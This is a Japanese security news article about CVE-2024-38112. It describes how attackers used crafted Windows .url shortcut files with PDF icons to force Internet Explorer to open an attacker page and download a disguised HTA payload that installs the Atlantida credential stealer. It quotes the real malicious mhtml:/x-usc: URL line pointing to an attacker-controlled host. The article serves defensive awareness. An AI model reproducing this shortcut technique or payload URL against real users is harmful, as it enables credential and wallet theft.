Windows MSHTMLの脆弱性が1年以上サイバー攻撃に悪用されていた(CVE-2024-38112)
2024年7月に Microsoft(マイクロソフト)がWindows MSHTMLの脆弱性(CVE-2024-38112)が修正されました。この脆弱性の発見者であるCheck Point ResearchのHaifei Li氏は2023年1月から悪用の痕跡を発見しており、1年以上ゼロデイ攻撃として悪用されていた可能性があります。
2024年9月16日追記:脅威アクターがこの脆弱性を修正を回避する方法を見つけ、ユーザーが脆弱な状態になっています。
目次
Windows MSHTMLの脆弱性の概要(CVE-2024-38112)
Windows MSHTML プラットフォームのなりすましの脆弱性
Windows MSHTMLの脆弱性を悪用するゼロデイ攻撃の概要
攻撃者は特別な Windows インターネット ショートカット ファイル (拡張子 .url) を使用しており、これをクリックすると、廃止された Internet Explorer (IE) が呼び出され、攻撃者が制御する URL にアクセスします。
IE は悪意のある .hta 拡張子名を隠すために使用されます。
Windows 上の最新の、はるかに安全な Chrome/Edge ブラウザーではなく IE で URL を開くことで、攻撃者は被害者のコンピューターが最新の Windows 10/11を実行しているにもかかわらず、そのコンピューターを悪用する上で大きな利益を獲得しています。
インターネット ショートカットファイルとは
IEのデスクトップなどで表示するアイコン、アイコンをダブルクリックしたときに開くリンクなどのさまざまな構成設定を含むテキスト ファイルです。.
url ファイルとして保存してダブルクリックすると、Windows は構成された URL を既定の Web ブラウザーで開きます。
Internet Explorerを開かせるためのmhtml
例えば、以下のようなPDFアイコンにインターネット ショートカットファイルを作成します。
画像引用:Checkpoint
上記ファイルの、.url=の最後の文字列行は、msedge.exe
はMicrosoft Edge アプリケーション ファイル内のカスタマイズされたアイコンを指しています。
これにより例えばデスクトップのファイルアイコンの見え方はPDFですが、クリックさせるとMicrosoft Edgeで指定したHTMLを開かせる事が可能です。
重要なのは、URL
キーワードの値が通常のものとはかなり異なることです。通常、一般的な .url ファイルの場合、パラメーターはURL を指すようURL
になります。
URL=https://www.google.comhttps://www.google.com
ただし、このサンプルでは、値は次のとおりです。
mhtml:http: //cbmelipilla.cl/te/test1.html! x-usc:http://cbmelipilla.cl/te/test1.html
脆弱性研究者のウィル・ドーマン氏によると、Internet Explorer で Web ページを開くと、悪意のあるファイルをダウンロードする際のセキュリティ警告が少なくなるため、脅威の攻撃者にとってさらなるメリットがもたらされるとしています。
この為、できるだけIEで開かせるよう、ハッカーは今回のような脆弱性を悪用しています。
本質的に、攻撃者は、Windows 10 および Windows 11 に Internet Explorer がまだデフォルトで含まれているという事実を利用します。
Microsoft が約 2 年前に廃止を発表し、実用的な機能のすべてを Edge に置き換えたにもかかわらず、時代遅れのブラウザは依然として呼び出され、悪意のある目的で悪用される可能性があります。
Check Point によれば、脅威の攻撃者はアイコン インデックス付きのインターネット ショートカット ファイルを作成し、それを PDF ファイルへのリンクとして表示しているとのこと。
PDFのファイルに偽装しHTAファイルをダウンロードさせる
画像引用:Checkpoint
クリックすると、指定された Web ページが Internet Explorer で開き、PDF ファイルのように見えますが
実際には HTA ファイルを自動的にダウンロードしようとします。
上記画像ではファイル名がBooks_A0UJKO.pdf
となっていますが、攻撃者は、以下に示すように、ファイル名に Unicode 文字を埋め込んで .hta 拡張子が表示されないようにすることで、HTA 拡張子を隠し、PDF がダウンロードされているように見せることができます。
画像引用:BleepingComputer
画像引用:Checkpoint
上記の IE ダイアログで「Open(開く)」(デフォルトのオプション) をクリックすると、別のダイアログが表示されます (以下を参照)。これは、IE の保護モード (比較的弱いブラウザ サンドボックス) によるものです。
画像引用:Checkpoint
ユーザーはファイルをPDFだと思ってダウンロードを許可しますが、許可すると最終的にマルウェアをダウンロードされパスワードを盗むマルウェアである Atlantida Stealer がインストールされます。
マルウェアが実行されると、ブラウザに保存されているすべての資格情報、Cookie、ブラウザ履歴、暗号通貨ウォレット、Steam 資格情報、その他の機密データが盗まれます。
Microsoft の脆弱性 CVE-2024-38112 の対応
Microsoft は、Internet Explorer から URI を登録解除することで CVE-2024-38112 の脆弱性を修正しmhtml:、代わりに Microsoft Edge で開くようになりました。
Checkpointの対応
またCheckpointは同社が提供するIPS および Harmony Email の保護機能、IPS シグネチャ「インターネット ショートカット ファイルのリモート コード実行」をリリースしています。
引用
Windows MSHTML zero-day used in malware attacks for over a year